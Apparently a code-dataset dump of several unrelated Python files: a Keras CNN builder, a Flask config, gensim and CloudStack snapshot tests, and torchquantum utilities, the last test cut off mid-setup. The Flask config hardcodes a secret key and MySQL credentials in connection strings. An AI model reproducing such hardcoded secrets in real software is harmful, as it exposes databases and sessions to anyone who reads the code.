from sklearn.tree import export_graphviz
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras import backend as K # used for housekeeping of tf models,
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from sklearn.decomposition import PCA
from tensorflow.keras import backend as K
from tensorflow.keras import Sequential
from tensorflow.keras import activations
from tensorflow.keras import initializers
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Dropout
from tensorflow.keras import optimizers
from tensorflow.keras import losses
from tensorflow.keras import metrics
from tensorflow.keras import Sequential, activations, initializers
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
# Function, ...........................................................................
def TwoConv_OneNN_model(*, input_size, output_size, params=dict(), verbose=False):
'''
creeast simple sequential model
params : dict with selected parameters and options used for model creation,
input_size,
output_size,
params=dict(),
verbose=False
'''
# default params,
try:
params["f1_units"]
except:
params["f1_units"]=100
try:
params["f1_dropout"]
except:
params["f1_dropout"]=0
try:
params["optimizer"]
except:
params["optimizer"]="Adam"
try:
params['early_strop']
except:
params['early_strop']=None
# Convolutional Network
model = keras.Sequential()
#.. 1st cnn, layer
model.add(keras.layers.Conv2D(
filters=64,
kernel_size=5,
strides=2,
activation='relu',
input_shape=input_size
))
#.. maxpool 1.
model.add(keras.layers.MaxPool2D(pool_size=2))
#.. 2nd cnn layer,
model.add(keras.layers.Conv2D(
filters=64,
kernel_size=3,
strides=1,
activation='relu'
))
#.. maxpool 2,
model.add(keras.layers.MaxPool2D(pool_size=2))
#.. flat the results,
model.add(keras.layers.Flatten())
#.. hidden layer
model.add(Dense(
units=params["f1_units"],
activation="relu",
#kernel_regularizer=tf.keras.regularizers.l2(0.001),
kernel_initializer=initializers.TruncatedNormal(mean=0.0, stddev=0.01, seed=0)
))
model.add(tf.keras.layers.Dropout(params["f1_dropout"]))
#.. output nn,
model.add(keras.layers.Dense(
units=output_size,
activation='softmax'
))
# compile,
model.compile(optimizer=params["optimizer"], loss='categorical_crossentropy', metrics=['acc'])
if verbose==True:
model.summary()
else:
pass
# create callback function,
if params['early_strop'] is not None:
callback_function = keras.callbacks.EarlyStopping(monitor='val_loss', patience=params["early_strop"])
return model, [callback_function]
else:
return model, None
| StarcoderdataPython |
47804 | # -*- coding: UTF-8 -*-
# https://dormousehole.readthedocs.io/en/latest/config.html#config
class Config(object):
SECRET_KEY = 'e9d37baf44de4b11a76159c50820468f'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_stock' # 股票数据库,默认
SQLALCHEMY_BINDS = {
'fund': 'mysql+pymysql://xingweidong:xingweidong&123@localhost/idss_fund' # 基金数据库
}
CHROME_DRIVER = '/Users/xingweidong/envs/selenium/webdriver/chrome/88.0.4324.96/chromedriver'
| StarcoderdataPython |
3386905 | from src.config import MESSAGE_UNEXPECTED_ERROR
from src.helper import log
def make(error, message=None, response=None):
response_dict = dict(error=error)
if error:
assert isinstance(message, str)
response_dict['message'] = message
else:
assert isinstance(response, dict)
response_dict['response'] = response
return response_dict
def raise_exception(e):
log.error(f'Unexpected error: [{e}]')
log.exception(e)
return make(error=True, message=MESSAGE_UNEXPECTED_ERROR)
| StarcoderdataPython |
3316312 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: <NAME> <<EMAIL>>
# Copyright (C) 2017 <NAME> <<EMAIL>>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking the poincare module from the models package.
"""
import logging
import unittest
import numpy as np
from gensim.corpora import Dictionary
from gensim.models import KeyedVectors as EuclideanKeyedVectors
from gensim.test.utils import datapath
logger = logging.getLogger(__name__)
class TestEuclideanKeyedVectors(unittest.TestCase):
def setUp(self):
self.vectors = EuclideanKeyedVectors.load_word2vec_format(
datapath('euclidean_vectors.bin'), binary=True, datatype=np.float64)
def similarity_matrix(self):
"""Test similarity_matrix returns expected results."""
corpus = [["government", "denied", "holiday"], ["holiday", "slowing", "hollingworth"]]
dictionary = Dictionary(corpus)
corpus = [dictionary.doc2bow(document) for document in corpus]
# checking symmetry and the existence of ones on the diagonal
similarity_matrix = self.similarity_matrix(corpus, dictionary).todense()
self.assertTrue((similarity_matrix.T == similarity_matrix).all())
self.assertTrue((np.diag(similarity_matrix) == similarity_matrix).all())
# checking that thresholding works as expected
similarity_matrix = self.similarity_matrix(corpus, dictionary, threshold=0.45).todense()
self.assertEquals(18, np.sum(similarity_matrix == 0))
# checking that exponent works as expected
similarity_matrix = self.similarity_matrix(corpus, dictionary, exponent=1.0).todense()
self.assertAlmostEqual(9.5788956, np.sum(similarity_matrix))
# checking that nonzero_limit works as expected
similarity_matrix = self.similarity_matrix(corpus, dictionary, nonzero_limit=4).todense()
self.assertEquals(4, np.sum(similarity_matrix == 0))
similarity_matrix = self.similarity_matrix(corpus, dictionary, nonzero_limit=3).todense()
self.assertEquals(20, np.sum(similarity_matrix == 0))
def test_most_similar(self):
"""Test most_similar returns expected results."""
expected = [
'conflict',
'administration',
'terrorism',
'call',
'israel'
]
predicted = [result[0] for result in self.vectors.most_similar('war', topn=5)]
self.assertEqual(expected, predicted)
def test_most_similar_topn(self):
"""Test most_similar returns correct results when `topn` is specified."""
self.assertEqual(len(self.vectors.most_similar('war', topn=5)), 5)
self.assertEqual(len(self.vectors.most_similar('war', topn=10)), 10)
predicted = self.vectors.most_similar('war', topn=None)
self.assertEqual(len(predicted), len(self.vectors.vocab))
def test_most_similar_raises_keyerror(self):
"""Test most_similar raises KeyError when input is out of vocab."""
with self.assertRaises(KeyError):
self.vectors.most_similar('not_in_vocab')
def test_most_similar_restrict_vocab(self):
"""Test most_similar returns handles restrict_vocab correctly."""
expected = set(self.vectors.index2word[:5])
predicted = set(result[0] for result in self.vectors.most_similar('war', topn=5, restrict_vocab=5))
self.assertEqual(expected, predicted)
def test_most_similar_with_vector_input(self):
"""Test most_similar returns expected results with an input vector instead of an input word."""
expected = [
'war',
'conflict',
'administration',
'terrorism',
'call',
]
input_vector = self.vectors['war']
predicted = [result[0] for result in self.vectors.most_similar([input_vector], topn=5)]
self.assertEqual(expected, predicted)
def test_most_similar_to_given(self):
"""Test most_similar_to_given returns correct results."""
predicted = self.vectors.most_similar_to_given('war', ['terrorism', 'call', 'waging'])
self.assertEqual(predicted, 'terrorism')
def test_similar_by_word(self):
"""Test similar_by_word returns expected results."""
expected = [
'conflict',
'administration',
'terrorism',
'call',
'israel'
]
predicted = [result[0] for result in self.vectors.similar_by_word('war', topn=5)]
self.assertEqual(expected, predicted)
def test_similar_by_vector(self):
"""Test similar_by_word returns expected results."""
expected = [
'war',
'conflict',
'administration',
'terrorism',
'call',
]
input_vector = self.vectors['war']
predicted = [result[0] for result in self.vectors.similar_by_vector(input_vector, topn=5)]
self.assertEqual(expected, predicted)
def test_distance(self):
"""Test that distance returns expected values."""
self.assertTrue(np.allclose(self.vectors.distance('war', 'conflict'), 0.06694602))
self.assertEqual(self.vectors.distance('war', 'war'), 0)
def test_similarity(self):
"""Test similarity returns expected value for two words, and for identical words."""
self.assertTrue(np.allclose(self.vectors.similarity('war', 'war'), 1))
self.assertTrue(np.allclose(self.vectors.similarity('war', 'conflict'), 0.93305397))
def test_words_closer_than(self):
"""Test words_closer_than returns expected value for distinct and identical nodes."""
self.assertEqual(self.vectors.words_closer_than('war', 'war'), [])
expected = set(['conflict', 'administration'])
self.assertEqual(set(self.vectors.words_closer_than('war', 'terrorism')), expected)
def test_rank(self):
"""Test rank returns expected value for distinct and identical nodes."""
self.assertEqual(self.vectors.rank('war', 'war'), 1)
self.assertEqual(self.vectors.rank('war', 'terrorism'), 3)
def test_wv_property(self):
"""Test that the deprecated `wv` property returns `self`. To be removed in v4.0.0."""
self.assertTrue(self.vectors is self.vectors.wv)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.DEBUG)
unittest.main()
| StarcoderdataPython |
3357116 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchquantum as tq
import copy
from torchquantum.macro import C_DTYPE
from torchpack.utils.logging import logger
from typing import List, Dict, Iterable
from torchpack.utils.config import Config
from qiskit.providers.aer.noise.device.parameters import gate_error_values
from qiskit import IBMQ
from qiskit.exceptions import QiskitError
def pauli_eigs(n) -> np.ndarray:
r"""Eigenvalues for :math:`A^{\o times n}`, where :math:`A` is
Pauli operator, or shares its eigenvalues.
As an example if n==2, then the eigenvalues of a tensor product consisting
of two matrices sharing the eigenvalues with Pauli matrices is returned.
Args:
n (int): the number of qubits the matrix acts on
Returns:
list: the eigenvalues of the specified observable
"""
if n == 1:
return np.array([1, -1])
return np.concatenate([pauli_eigs(n - 1), -pauli_eigs(n - 1)])
def diag(x):
# input tensor, output tensor with diagonal as the input
# manual implementation because torch.diag does not support autograd of
# complex number
diag_len = x.shape[-1]
x = x.unsqueeze(-1)
dims = list(x.shape)
x = torch.cat([x, torch.zeros(dims[:-1] + [diag_len]).to(x.device)],
dim=-1)
x = x.view(dims[:-2] + [diag_len * (diag_len + 1)])[..., :-diag_len]
x = x.view(dims[:-2] + [diag_len, diag_len])
return x
class Timer(object):
def __init__(self, device='gpu', name='', times=100):
self.device = device
self.name = name
self.times = times
if device == 'gpu':
self.start = torch.cuda.Event(enable_timing=True)
self.end = torch.cuda.Event(enable_timing=True)
def __enter__(self):
if self.device == 'gpu':
self.start.record()
def __exit__(self, exc_type, exc_value, tb):
if self.device == 'gpu':
self.end.record()
torch.cuda.synchronize()
print(f"Task: {self.name}: "
f"{self.start.elapsed_time(self.end) / self.times} ms")
def get_unitary_loss(model: nn.Module):
loss = 0
for name, params in model.named_parameters():
if 'TrainableUnitary' in name:
U = params
like_identity = U.matmul(U.conj().permute(0, 2, 1))
identity = torch.eye(U.shape[0], dtype=C_DTYPE,
device=U.device)
loss += F.mse_loss(torch.view_as_real(identity),
torch.view_as_real(like_identity))
return loss
def legalize_unitary(model: nn.Module):
with torch.no_grad():
for name, params in model.named_parameters():
if 'TrainableUnitary' in name:
U = params
U, Sigma, V = torch.svd(U)
params.data.copy_(U.matmul(V.conj().permute(0, 2, 1)))
def switch_little_big_endian_matrix(mat):
if len(mat.shape) % 2 == 1:
is_batch_matrix = True
bsz = mat.shape[0]
reshape = [bsz] + [2] * int(np.log2(mat[0].size))
else:
is_batch_matrix = False
reshape = [2] * int(np.log2(mat.size))
original_shape = mat.shape
mat = mat.reshape(reshape)
axes = list(range(len(mat.shape) // 2))
axes.reverse()
axes += [axis + len(mat.shape) // 2 for axis in axes]
if is_batch_matrix:
axes = [0] + [axis + 1 for axis in axes]
mat = np.transpose(mat, axes=axes).reshape(original_shape)
return mat
def switch_little_big_endian_state(state):
if len(state.shape) > 1:
is_batch_state = True
bsz = state.shape[0]
reshape = [bsz] + [2] * int(np.log2(state[0].size))
elif len(state.shape) == 1:
is_batch_state = False
reshape = [2] * int(np.log2(state.size))
else:
logger.exception(f"Dimension of statevector should be 1 or 2")
raise ValueError
original_shape = state.shape
state = state.reshape(reshape)
if is_batch_state:
axes = list(range(1, len(state.shape)))
axes.reverse()
axes = [0] + axes
else:
axes = list(range(len(state.shape)))
axes.reverse()
mat = np.transpose(state, axes=axes).reshape(original_shape)
return mat
def switch_little_big_endian_matrix_test():
logger.info(switch_little_big_endian_matrix(np.ones((16, 16))))
logger.info(switch_little_big_endian_matrix(np.ones((5, 16, 16))))
def switch_little_big_endian_state_test():
logger.info(switch_little_big_endian_state(np.ones((5, 16))))
logger.info(switch_little_big_endian_state(np.arange(8)))
def get_expectations_from_counts(counts, n_wires):
exps = []
if isinstance(counts, dict):
counts = [counts]
for count in counts:
ctr_one = [0] * n_wires
total_shots = 0
for k, v in count.items():
for wire in range(n_wires):
if k[wire] == '1':
ctr_one[wire] += v
total_shots += v
prob_one = np.array(ctr_one) / total_shots
exp = np.flip(-1 * prob_one + 1 * (1 - prob_one))
exps.append(exp)
res = np.stack(exps)
return res
def find_global_phase(mat1, mat2, threshold):
for i in range(mat1.shape[0]):
for j in range(mat1.shape[1]):
# find a numerical stable global phase
if np.abs(mat1[i][j]) > threshold and \
np.abs(mat1[i][j]) > threshold:
return mat2[i][j] / mat1[i][j]
return None
def build_module_op_list(m: tq.QuantumModule, x=None) -> List:
"""
serialize all operations in the module and generate a list with
[{'name': RX, 'has_params': True, 'trainable': True, 'wires': [0],
n_wires: 1, 'params': [array([[0.01]])]}]
so that an identity module can be reconstructed
The module needs to have static support
"""
m.static_off()
m.static_on(wires_per_block=None)
m.is_graph_top = False
# forward to register all modules and parameters
if x is None:
m.forward(q_device=None)
else:
m.forward(q_device=None, x=x)
m.is_graph_top = True
m.graph.build_flat_module_list()
module_list = m.graph.flat_module_list
m.static_off()
op_list = []
for module in module_list:
if module.params is not None:
if module.params.shape[0] > 1:
# more than one param, so it is from classical input with
# batch mode
assert not module.has_params
params = None
else:
# has quantum params, batch has to be 1
params = module.params[0].data.cpu().numpy()
else:
params = None
op_list.append({
'name': module.name.lower(),
'has_params': module.has_params,
'trainable': module.trainable,
'wires': module.wires,
'n_wires': module.n_wires,
'params': params
})
return op_list
def build_module_from_op_list(op_list: List[Dict],
remove_ops=False,
thres=None) -> tq.QuantumModule:
logger.info(f"Building module from op_list...")
thres = 1e-5 if thres is None else thres
n_removed_ops = 0
ops = []
for info in op_list:
params = info['params']
if remove_ops:
if params is not None:
params = np.array(params) if isinstance(params, Iterable) \
else np.array([params])
params = params % (2 * np.pi)
params[params > np.pi] -= 2 * np.pi
if all(abs(params) < thres):
n_removed_ops += 1
continue
op = tq.op_name_dict[info['name']](
has_params=info['has_params'],
trainable=info['trainable'],
wires=info['wires'],
n_wires=info['n_wires'],
init_params=info['params'],
)
ops.append(op)
if n_removed_ops > 0:
logger.warning(f"Remove in total {n_removed_ops} pruned operations.")
else:
logger.info(f"Do not remove any operations.")
return tq.QuantumModuleFromOps(ops)
def build_module_description_test():
import pdb
from torchquantum.plugins import tq2qiskit
pdb.set_trace()
from examples.core.models.q_models import QFCModel12
q_model = QFCModel12({'n_blocks': 4})
desc = build_module_op_list(q_model.q_layer)
print(desc)
q_dev = tq.QuantumDevice(n_wires=4)
m = build_module_from_op_list(desc)
tq2qiskit(q_dev, m, draw=True)
desc = build_module_op_list(tq.RandomLayerAllTypes(
n_ops=200, wires=[0, 1, 2, 3], qiskit_compatible=True))
print(desc)
m1 = build_module_from_op_list(desc)
tq2qiskit(q_dev, m1, draw=True)
def get_p_v_reg_mapping(circ):
"""
p are physical qubits
v are logical qubits
"""
p2v_orig = circ._layout.get_physical_bits().copy()
mapping = {
'p2v': {},
'v2p': {},
}
for p, v in p2v_orig.items():
if v.register.name == 'q':
mapping['p2v'][p] = v.index
mapping['v2p'][v.index] = p
return mapping
def get_p_c_reg_mapping(circ):
"""
p are physical qubits
c are classical registers
"""
mapping = {
'p2c': {},
'c2p': {},
}
for gate in circ.data:
if gate[0].name == 'measure':
mapping['p2c'][gate[1][0].index] = gate[2][0].index
mapping['c2p'][gate[2][0].index] = gate[1][0].index
return mapping
def get_v_c_reg_mapping(circ):
"""
p are physical qubits, the real fabricated qubits
v are logical qubits, also the 'wires' in torchquantum lib
c are classical registers
want to get v2c
"""
p2v_orig = circ._layout.get_physical_bits().copy()
p2v = {}
for p, v in p2v_orig.items():
if v.register.name == 'q':
p2v[p] = v.index
mapping = {
'p2c': {},
'c2p': {},
}
for gate in circ.data:
if gate[0].name == 'measure':
mapping['p2c'][gate[1][0].index] = gate[2][0].index
mapping['c2p'][gate[2][0].index] = gate[1][0].index
mapping2 = {
'v2c': {},
'c2v': {}
}
for c, p in mapping['c2p'].items():
mapping2['c2v'][c] = p2v[p]
for c, v in mapping2['c2v'].items():
mapping2['v2c'][v] = c
return mapping2
def get_cared_configs(conf, mode) -> Config:
"""only preserve cared configs"""
conf = copy.deepcopy(conf)
ignores = ['callbacks',
'criterion',
'debug',
'legalization',
'regularization',
'verbose',
'get_n_params',
'prune',
]
if 'super' not in conf.trainer.name:
ignores.append('scheduler')
ignores.append('optimizer')
for ignore in ignores:
if hasattr(conf, ignore):
delattr(conf, ignore)
if hasattr(conf, 'dataset'):
dataset_ignores = ['binarize',
'binarize_threshold',
'center_crop',
'name',
'resize',
'resize_mode',
'root',
'train_valid_split_ratio',
]
for dataset_ignore in dataset_ignores:
if hasattr(conf.dataset, dataset_ignore):
delattr(conf.dataset, dataset_ignore)
if not mode == 'es' and hasattr(conf, 'es'):
delattr(conf, 'es')
elif mode == 'es' and hasattr(conf, 'es') and hasattr(conf.es, 'eval'):
delattr(conf.es, 'eval')
# if not mode == 'train' and hasattr(conf, 'trainer'):
# delattr(conf, 'trainer')
if hasattr(conf, 'qiskit'):
qiskit_ignores = [
'seed_simulator',
'seed_transpiler',
'coupling_map_name',
'basis_gates_name',
'est_success_rate',
]
for qiskit_ignore in qiskit_ignores:
if hasattr(conf.qiskit, qiskit_ignore):
delattr(conf.qiskit, qiskit_ignore)
if hasattr(conf, 'run'):
run_ignores = ['device',
'workers_per_gpu',
'n_epochs']
for run_ignore in run_ignores:
if hasattr(conf.run, run_ignore):
delattr(conf.run, run_ignore)
return conf
def get_success_rate(properties, transpiled_circ):
# estimate the success rate according to the error rates of single and
# two-qubit gates in transpiled circuits
gate_errors = gate_error_values(properties)
# construct the error dict
gate_error_dict = {}
for gate_error in gate_errors:
if gate_error[0] not in gate_error_dict.keys():
gate_error_dict[gate_error[0]] = {tuple(gate_error[1]):
gate_error[2]}
else:
gate_error_dict[gate_error[0]][tuple(gate_error[1])] = \
gate_error[2]
success_rate = 1
for gate in transpiled_circ.data:
gate_success_rate = 1 - gate_error_dict[gate[0].name][tuple(
map(lambda x: x.index, gate[1])
)]
success_rate *= gate_success_rate
return success_rate
def get_provider(backend_name, hub=None):
# mass-inst-tech-1 or MIT-1
if backend_name in ['ibmq_casablanca',
'ibmq_rome',
'ibmq_bogota']:
if hub == 'mass' or hub is None:
provider = IBMQ.get_provider(hub='ibm-q-research',
group='mass-inst-tech-1',
project='main')
elif hub == 'mit':
provider = IBMQ.get_provider(hub='ibm-q-research',
group='MIT-1',
project='main')
else:
raise ValueError(f"not supported backend {backend_name} in hub "
f"{hub}")
elif backend_name in ['ibmq_paris',
'ibmq_toronto',
'ibmq_manhattan',
'ibmq_guadalupe']:
provider = IBMQ.get_provider(hub='ibm-q-ornl',
group='anl',
project='csc428')
else:
if hub == 'mass' or hub is None:
try:
provider = IBMQ.get_provider(hub='ibm-q-research',
group='mass-inst-tech-1',
project='main')
except QiskitError:
logger.warning(f"Cannot use MIT backend, roll back to open")
provider = IBMQ.get_provider(hub='ibm-q')
elif hub == 'mit':
provider = IBMQ.get_provider(hub='ibm-q-research',
group='MIT-1',
project='main')
else:
provider = IBMQ.get_provider(hub='ibm-q')
return provider
def normalize_statevector(states):
# make sure the square magnitude of statevector sum to 1
# states = states.contiguous()
original_shape = states.shape
states_reshape = states.reshape(states.shape[0], -1)
# for states with no energy, need to set all zero state as energy 1
energy = (abs(states_reshape) ** 2).sum(dim=-1)
if energy.min() == 0:
for k, val in enumerate(energy):
if val == 0:
states_reshape[k][0] = 1
factors = torch.sqrt(1 / ((abs(states_reshape) ** 2).sum(
dim=-1))).unsqueeze(-1)
states = (states_reshape * factors).reshape(original_shape)
return states
if __name__ == '__main__':
build_module_description_test()
switch_little_big_endian_matrix_test()
switch_little_big_endian_state_test()
| StarcoderdataPython |
3281535 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Test cases relating to listSnapshot() relating to parameters - id,listall,isrecursive,account and domainid
"""
# Import Local Modules
import marvin
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.lib.utils import *
from marvin.lib.base import *
from marvin.lib.common import *
from nose.plugins.attrib import attr
# Import System modules
import time
_multiprocess_shared_ = True
class TestSnapshotList(cloudstackTestCase):
@classmethod
def setUpClass(cls):
"""
Create the following domain tree and accounts that are reqiured for executing listSnapshot test cases:
Under ROOT - create 2 domaind D1 and D2
Under D1 - Create 2 subdomain D11 and D12
Under D11 - Create subdimain D111
Under each of the domain create 1 admin user and couple of regular users.
As each of these users , deploy Virtual machines and take a snapshot of the ROOT volume.
"""
cls.testclient = super(TestSnapshotList, cls).getClsTestClient()
cls.apiclient = cls.testclient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
cls.hypervisor = cls.testclient.getHypervisorInfo()
if cls.hypervisor.lower() == 'lxc':
raise unittest.SkipTest("snapshots are not supported on %s" % cls.hypervisor.lower())
cls.acldata = cls.testdata["acl"]
cls.domain_1 = None
cls.domain_2 = None
cleanup = None
try:
# backup default apikey and secretkey
cls.default_apikey = cls.apiclient.connection.apiKey
cls.default_secretkey = cls.apiclient.connection.securityKey
# Create domains
cls.domain_1 = Domain.create(
cls.apiclient,
cls.acldata["domain1"]
)
cls.domain_11 = Domain.create(
cls.apiclient,
cls.acldata["domain11"],
parentdomainid=cls.domain_1.id
)
cls.domain_111 = Domain.create(
cls.apiclient,
cls.acldata["domain111"],
parentdomainid=cls.domain_11.id,
)
cls.domain_12 = Domain.create(
cls.apiclient,
cls.acldata["domain12"],
parentdomainid=cls.domain_1.id
)
cls.domain_2 = Domain.create(
cls.apiclient,
cls.acldata["domain2"]
)
# Create 1 admin account and 2 user accounts for doamin_1
cls.account_d1 = Account.create(
cls.apiclient,
cls.acldata["accountD1"],
admin=True,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d1)
cls.user_d1_apikey = user.apikey
cls.user_d1_secretkey = user.secretkey
cls.account_d1a = Account.create(
cls.apiclient,
cls.acldata["accountD1A"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d1a)
cls.user_d1a_apikey = user.apikey
cls.user_d1a_secretkey = user.secretkey
cls.account_d1b = Account.create(
cls.apiclient,
cls.acldata["accountD1B"],
admin=False,
domainid=cls.domain_1.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d1b)
cls.user_d1b_apikey = user.apikey
cls.user_d1b_secretkey = user.secretkey
# Create 1 admin and 2 user accounts for doamin_11
cls.account_d11 = Account.create(
cls.apiclient,
cls.acldata["accountD11"],
admin=True,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d11)
cls.user_d11_apikey = user.apikey
cls.user_d11_secretkey = user.secretkey
cls.account_d11a = Account.create(
cls.apiclient,
cls.acldata["accountD11A"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d11a)
cls.user_d11a_apikey = user.apikey
cls.user_d11a_secretkey = user.secretkey
cls.account_d11b = Account.create(
cls.apiclient,
cls.acldata["accountD11B"],
admin=False,
domainid=cls.domain_11.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d11b)
cls.user_d11b_apikey = user.apikey
cls.user_d11b_secretkey = user.secretkey
# Create 1 user account for doamin_111
cls.account_d111a = Account.create(
cls.apiclient,
cls.acldata["accountD111A"],
admin=False,
domainid=cls.domain_111.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d111a)
cls.user_d111a_apikey = user.apikey
cls.user_d111a_secretkey = user.secretkey
# Create 2 user accounts for doamin_12
cls.account_d12a = Account.create(
cls.apiclient,
cls.acldata["accountD12A"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d12a)
cls.user_d12a_apikey = user.apikey
cls.user_d12a_secretkey = user.secretkey
cls.account_d12b = Account.create(
cls.apiclient,
cls.acldata["accountD12B"],
admin=False,
domainid=cls.domain_12.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d12b)
cls.user_d12b_apikey = user.apikey
cls.user_d12b_secretkey = user.secretkey
# Create 1 user account for domain_2
cls.account_d2a = Account.create(
cls.apiclient,
cls.acldata["accountD2"],
admin=False,
domainid=cls.domain_2.id
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_d2a)
cls.user_d2a_apikey = user.apikey
cls.user_d2a_secretkey = user.secretkey
# Create admin user account
cls.account_a = Account.create(
cls.apiclient,
cls.acldata["accountROOTA"],
admin=True,
)
user = cls.generateKeysForUser(cls.apiclient, cls.account_a)
cls.user_a_apikey = user.apikey
cls.user_a_secretkey = user.secretkey
# create service offering
cls.service_offering = ServiceOffering.create(
cls.apiclient,
cls.acldata["service_offering"]["small"]
)
cls.zone = get_zone(cls.apiclient, cls.testclient.getZoneForTests())
cls.acldata['mode'] = cls.zone.networktype
cls.template = get_template(cls.apiclient, cls.zone.id, cls.acldata["ostype"])
# deploy VM
cls.apiclient.connection.apiKey = cls.user_d1_apikey
cls.apiclient.connection.securityKey = cls.user_d1_secretkey
cls.vm_d1 = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD1"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d1_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d1.id)
cls.vm_d1_snapshot = Snapshot.create(cls.apiclient, cls.vm_d1_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d1a_apikey
cls.apiclient.connection.securityKey = cls.user_d1a_secretkey
cls.vm_d1a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD1A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d1a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d1a.id)
cls.vm_d1a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d1a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d1b_apikey
cls.apiclient.connection.securityKey = cls.user_d1b_secretkey
cls.vm_d1b = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD1B"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d1b_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d1b.id)
cls.vm_d1b_snapshot = Snapshot.create(cls.apiclient, cls.vm_d1b_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d11_apikey
cls.apiclient.connection.securityKey = cls.user_d11_secretkey
cls.vm_d11 = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD11"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d11_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d11.id)
cls.vm_d11_snapshot = Snapshot.create(cls.apiclient, cls.vm_d11_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d11a_apikey
cls.apiclient.connection.securityKey = cls.user_d11a_secretkey
cls.vm_d11a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD11A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d11a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d11a.id)
cls.vm_d11a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d11a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d11b_apikey
cls.apiclient.connection.securityKey = cls.user_d11b_secretkey
cls.vm_d11b = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD11B"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d11b_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d11b.id)
cls.vm_d11b_snapshot = Snapshot.create(cls.apiclient, cls.vm_d11b_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d111a_apikey
cls.apiclient.connection.securityKey = cls.user_d111a_secretkey
cls.vm_d111a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD111A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d111a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d111a.id)
cls.vm_d111a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d111a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d12a_apikey
cls.apiclient.connection.securityKey = cls.user_d12a_secretkey
cls.vm_d12a = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD12A"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d12a_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d12a.id)
cls.vm_d12a_snapshot = Snapshot.create(cls.apiclient, cls.vm_d12a_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d12b_apikey
cls.apiclient.connection.securityKey = cls.user_d12b_secretkey
cls.vm_d12b = VirtualMachine.create(
cls.apiclient,
cls.acldata["vmD12B"],
zoneid=cls.zone.id,
serviceofferingid=cls.service_offering.id,
templateid=cls.template.id
)
cls.vm_d12b_volume = Volume.list(cls.apiclient, virtualmachineid=cls.vm_d12b.id)
cls.vm_d12b_snapshot = Snapshot.create(cls.apiclient, cls.vm_d12b_volume[0].id)
cls.apiclient.connection.apiKey = cls.user_d2a_apikey
